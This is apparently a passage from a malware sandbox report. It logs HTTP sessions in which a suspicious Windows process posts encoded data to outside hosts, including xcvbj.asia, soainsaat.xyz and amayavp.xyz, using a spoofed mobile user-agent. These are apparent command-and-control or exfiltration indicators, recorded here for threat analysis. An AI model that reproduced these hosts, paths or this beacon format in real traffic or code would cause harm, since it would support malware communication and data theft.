                                                                Data Ascii: 6dr=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMXPK4MdfCJA9JYHcWiZUoZXsGk9RrzqDbWtLTdyArZLmQ==


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 7 | 192.168.2.6 | 49872 | 149.88.81.190 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:54:23.048840046 CET | 1786 | OUT | POST /rq1s/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.xcvbj.asia
                                                                Origin: http://www.xcvbj.asia
                                                                Referer: http://www.xcvbj.asia/rq1s/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 57 75 6f 30 52 57 31 78 2b 32 4a 38 50 6f 53 70 4d 76 51 32 51 79 33 4f 30 61 55 56 2b 47 63 4e 39 64 6c 78 59 59 56 49 53 4c 4f 34 54 43 55 57 73 79 4d 5a 41 50 78 6f 4a 63 65 6f 71 6d 4b 59 51 2f 6b 65 65 43 4e 6f 32 73 6f 44 46 72 37 64 64 39 76 76 4b 45 31 77 2b 31 4b 45 5a 4b 57 77 42 34 4f 76 43 37 4a 42 47 75 6f 30 35 7a 69 68 38 6c 6f 7a 41 67 38 64 6a 52 2b 58 6a 51 2b 68 6a 6d 51 47 33 71 31 4f 6e 55 52 61 46 54 37 4a 39 2b 71 63 2f 2f 66 6d 75 37 43 39 64 6c 6a 57 4b 6c 46 67 [TRUNCATED]
                                                                Data Ascii: 6dr=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3Wuo0RW1x+2J8PoSpMvQ2Qy3O0aUV+GcN9dlxYYVISLO4TCUWsyMZAPxoJceoqmKYQ/keeCNo2soDFr7dd9vvKE1w+1KEZKWwB4OvC7JBGuo05zih8lozAg8djR+XjQ+hjmQG3q1OnURaFT7J9+qc//fmu7C9dljWKlFgUdCecnyvSUvEV7rOugR6Ne/76HFEvgpQzpFH0Co86RhU/v4Q7Zdukddz8rvPNLxUhhjFXZZMm+qHK+i87NS/WkSz15Zz8d9ARliYg7hwVMcjm3UpAw47iMFr4D1pMbhoeI8jY1i+XbzVELMvDY2p6OFZ35O9EEvih98uooFaGwzU3FReIU8JO1c7BUjdDZFUqYrVOk2prsjUC+C/H6+SKqr5+qdEiJdfLn+Jw389ksZqc34U5GwDrTGI391J1vqBSHUvGVrMbklVk8iItWs6oMJ3uDH8u+qK2DrJhNxaHb9ivWT70TGiLvQ+ECCf6+haa6g9D5EKFAMNnA3UNeBMkahJGWOUxvKLmagwooX//jWgpiQ+vHs8ifReyvQAIUUBlJBwlBa+lEWA06z3TV1mKA1SUbECuTdSezX/A5OhlTaeMg3Q2O5g46hcFXI56SRo3FETuKpBbs0c0HE3bUaxVcDOp/yHgWNJkRMKNpYTxc53fcUUeLtZsn/4mtzSv/+Z6sByzS5Bl4Kp0CkYUCjctVKS7rxY+0rQ8dsiJyfTY7hAOp071dJVb12uBjVoSS6Hra+y7LgrLEjOit/QslJwYUMl3RJjjTv9oQsyO79+OPb7zyEEYVwnzPeS96Ga2DZCqaduNNLmWNY/B5d2pnl/I4VT8zEZsRbDCg [TRUNCATED]


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 8 | 192.168.2.6 | 49878 | 149.88.81.190 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:54:25.716041088 CET | 496 | OUT | GET /rq1s/?6dr=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.xcvbj.asia
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 9 | 192.168.2.6 | 49944 | 85.159.66.93 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:54:53.895574093 CET | 758 | OUT | POST /rum2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.soainsaat.xyz
                                                                Origin: http://www.soainsaat.xyz
                                                                Referer: http://www.soainsaat.xyz/rum2/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 6f 59 63 45 46 71 32 56 6f 6a 46 32 41 2b 6b 39 74 4f 64 72 77 7a 68 79 38 7a 6c 6e 75 49 53 7a 6b 71 7a 47 6d 36 33 7a 54 57 49
                                                                Data Ascii: 6dr=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRooYcEFq2VojF2A+k9tOdrwzhy8zlnuISzkqzGm63zTWI


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 10 | 192.168.2.6 | 49950 | 85.159.66.93 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:54:56.577236891 CET | 782 | OUT | POST /rum2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.soainsaat.xyz
                                                                Origin: http://www.soainsaat.xyz
                                                                Referer: http://www.soainsaat.xyz/rum2/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 54 6a 79 2b 72 58 6e 4f 49 34 78 6b 53 7a 55 78 32 51 38 6e 7a 72 77 79 6f 34 71 7a 5a 63 47 57 49 6a 43 75 56 45 75 4c 37 79 37 41 3d 3d
                                                                Data Ascii: 6dr=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gTjy+rXnOI4xkSzUx2Q8nzrwyo4qzZcGWIjCuVEuL7y7A==


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 11 | 192.168.2.6 | 49958 | 85.159.66.93 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:54:59.237972975 CET | 1795 | OUT | POST /rum2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.soainsaat.xyz
                                                                Origin: http://www.soainsaat.xyz
                                                                Referer: http://www.soainsaat.xyz/rum2/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 62 32 34 53 4f 71 78 64 75 70 75 42 50 6c 79 5a 48 54 67 5a 77 6b 35 6c 47 59 48 67 71 2f 39 32 66 6c 2f 48 4d 75 6f 44 4d 46 51 47 45 64 45 61 74 50 76 6f 4b 68 67 74 73 37 63 41 59 6b 52 2b 54 35 6a 45 46 54 44 6b 52 36 34 68 6a 51 71 4b 7a 37 4b 52 33 74 35 52 34 4f 46 36 2f 44 65 75 44 62 59 4f 38 45 32 45 4c 50 35 74 44 4a 51 69 67 4c 5a 74 69 4b 62 65 68 5a 52 79 75 39 49 4f 36 48 44 33 6c 34 6c 31 2b 32 54 37 78 71 50 58 74 45 76 45 41 64 79 4d 43 68 64 72 42 51 4d 68 41 42 48 41 [TRUNCATED]
                                                                Data Ascii: 6dr=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4b24SOqxdupuBPlyZHTgZwk5lGYHgq/92fl/HMuoDMFQGEdEatPvoKhgts7cAYkR+T5jEFTDkR64hjQqKz7KR3t5R4OF6/DeuDbYO8E2ELP5tDJQigLZtiKbehZRyu9IO6HD3l4l1+2T7xqPXtEvEAdyMChdrBQMhABHAgx5NE3XaBGoY+Ezyvd23/+3rgkuGOjTIDU9Rd/WkO/As61dTh9muS38CvwRchcktNBPZa+pUYpFEVOKP9F4s7ecoRg9+Ebbbq7dASpVALVbS7sIOEFbCedPk36dzYfAf3OdyPs/eaRKMhFf4kJJ4xHtPDjW6VPJEgZ8Ta0cKSrUS2OeQjVHiGOtTeZFnTW3YD+myRPC/CqJKEKQ4SQomfBJw19orfHYdPLPqqz7A6/7QYv5ngoUXvyJbNJVmRXqMADQSIwpez0MzAhpTSn6riJ/94qBhpCzSPb9qKjHgBbQS+Joc7oYzJT/BQEMoKl2iNUJLLvNYweFCT2fEWlkJr59QajgANxpeiam/C15YqCrSiBdmVvMHbSZ7m92826oNA8ogth0McaVOIA6NA5P59mSl+wQg4AMwxPxOpcOzoXeoY13+wsalRI8ssyLgG274S3ftKTIWeHj+2G+IQweXn4WNnGuCzjS7YVmOmmDrIv8rv5xibIzkJStzuQI1h/yQk3UJbdYdEHL/X+BJGNOM1Gfm8NDFfT355457tKkMtOeNHjok+8iNlETm6Csd+9RzVDKFA+1SRpz2diEyEv1f1bycptdWn8/Il/y9UZj3hzcxg23umNRDUiwR98iKl5879lyFLb/nDs3ow+hAKVpXJv0MZiUKuJY1Yq [TRUNCATED]


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 12 | 192.168.2.6 | 49966 | 85.159.66.93 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:55:01.903806925 CET | 499 | OUT | GET /rum2/?6dr=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.soainsaat.xyz
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                 Nov 27, 2024 08:55:03.325696945 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx/1.14.1
                                                                Date: Wed, 27 Nov 2024 07:55:03 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                X-Rate-Limit-Limit: 5s
                                                                X-Rate-Limit-Remaining: 19
                                                                X-Rate-Limit-Reset: 2024-11-27T07:55:08.0915773Z


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 13 | 192.168.2.6 | 49983 | 185.27.134.144 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:55:08.993829012 CET | 752 | OUT | POST /d9ku/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.amayavp.xyz
                                                                Origin: http://www.amayavp.xyz
                                                                Referer: http://www.amayavp.xyz/d9ku/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 5a 4a 74 5a 33 7a 4b 2f 72 38 71 7a 4a 37 4f 78 46 42 52 4e 57 51 31 56 6c 31 39 50 6f 47 34 45 54 6f 33 4c 63 77 32 44 6a 31 51
                                                                Data Ascii: 6dr=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtZJtZ3zK/r8qzJ7OxFBRNWQ1Vl19PoG4ETo3Lcw2Dj1Q
                                                                 Nov 27, 2024 08:55:10.226185083 CET | 686 | IN | HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:10 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Cache-Control: no-cache
                                                                Content-Encoding: br
                                                                Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff af a9 a7 2b 8f 2e 79 b2 1c 1f 25 06 bb f6 a9 b9 75 a2 90 bd 3b 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 29 3b 3d d4 2a 05 f0 93 8a f6 0c 93 c2 fa 05 ef 2f 30 2a 9b e2 c6 4c f9 72 2e 65 39 c1 c8 59 04 0e e0 94 37 9f df 85 f3 43 46 04 9c 13 d1 a1 46 90 2a e3 dd 81 c3 92 76 34 52 84 fc 43 dc f7 ff 53 24 9e fc 36 20 07 b8 56 9c f9 fc a6 ce 44 c6 ec 1a 4d eb fa f9 b9 14 8a fe d2 df d3 bf 98 cc 8d b9 9e cf ed ee 52 87 6f 08 e6 a9 37 18 d3 b6 91 45 bb e9 de b7 bd 68 87 21 f1 a1 09 22 55 ba cf f6 f7 25 96 b8 81 31 09 2f 8e 13 68 10 44 6a d9 65 6f 48 e4 7f bd 3d 6b 00 fa 0f dc 56 00 95 d5 4e 6a 1b 45 b1 4b b5 ca 6b 95 40 a6 5d 05 5a 56 29 26 b4 b2 79 ad f3 24 4d eb d8 7b 9f ab 3a d1 3a cd b5 04 1d 43 0e 55 aa db b9 1c a0 fa 71 3b 73 b9 d2 10 a5 69 15 43 94 82 4e 41 b7 1d 24 d2 81 ca 64 1a 8d b8 70 93 7a db e8 09 60 ca e0 df df a5 5f 2c 0d 0e 91 86 08 76 fe fa fe 83 3b 5f cf 77 d3 65 50 d3 98 5a 5a 11 12 e2 02 45 [TRUNCATED]
                                                                Data Ascii: (brotli-compressed chunk of 0x1bc bytes; not printable as text, see Data Raw above)


                                                                Session ID: 14 | Source IP: 192.168.2.6 | Source Port: 49990 | Destination IP: 185.27.134.144 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:11.659991026 CET | 776 | OUT | POST /d9ku/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.amayavp.xyz
                                                                Origin: http://www.amayavp.xyz
                                                                Referer: http://www.amayavp.xyz/d9ku/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 77 33 56 6e 74 50 50 49 47 53 47 54 51 33 5a 4c 38 52 4d 58 51 7a 44 58 65 48 48 49 44 53 59 70 73 4e 38 54 55 55 49 4d 71 73 69 41 3d 3d
                                                                Data Ascii: 6dr=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfGw3VntPPIGSGTQ3ZL8RMXQzDXeHHIDSYpsN8TUUIMqsiA==
                                                                Nov 27, 2024 08:55:12.937143087 CET | 686 | IN | HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:12 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Cache-Control: no-cache
                                                                Content-Encoding: br
                                                                Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff af a9 a7 2b 8f 2e 79 b2 1c 1f 25 06 bb f6 a9 b9 75 a2 90 bd 3b 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 29 3b 3d d4 2a 05 f0 93 8a f6 0c 93 c2 fa 05 ef 2f 30 2a 9b e2 c6 4c f9 72 2e 65 39 c1 c8 59 04 0e e0 94 37 9f df 85 f3 43 46 04 9c 13 d1 a1 46 90 2a e3 dd 81 c3 92 76 34 52 84 fc 43 dc f7 ff 53 24 9e fc 36 20 07 b8 56 9c f9 fc a6 ce 44 c6 ec 1a 4d eb fa f9 b9 14 8a fe d2 df d3 bf 98 cc 8d b9 9e cf ed ee 52 87 6f 08 e6 a9 37 18 d3 b6 91 45 bb e9 de b7 bd 68 87 21 f1 a1 09 22 55 ba cf f6 f7 25 96 b8 81 31 09 2f 8e 13 68 10 44 6a d9 65 6f 48 e4 7f bd 3d 6b 00 fa 0f dc 56 00 95 d5 4e 6a 1b 45 b1 4b b5 ca 6b 95 40 a6 5d 05 5a 56 29 26 b4 b2 79 ad f3 24 4d eb d8 7b 9f ab 3a d1 3a cd b5 04 1d 43 0e 55 aa db b9 1c a0 fa 71 3b 73 b9 d2 10 a5 69 15 43 94 82 4e 41 b7 1d 24 d2 81 ca 64 1a 8d b8 70 93 7a db e8 09 60 ca e0 df df a5 5f 2c 0d 0e 91 86 08 76 fe fa fe 83 3b 5f cf 77 d3 65 50 d3 98 5a 5a 11 12 e2 02 45 [TRUNCATED]
                                                                Data Ascii: (brotli-compressed chunk of 0x1bc bytes; not printable as text, see Data Raw above)


                                                                Session ID: 15 | Source IP: 192.168.2.6 | Source Port: 49997 | Destination IP: 185.27.134.144 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:14.328850985 CET | 1789 | OUT | POST /d9ku/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.amayavp.xyz
                                                                Origin: http://www.amayavp.xyz
                                                                Referer: http://www.amayavp.xyz/d9ku/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
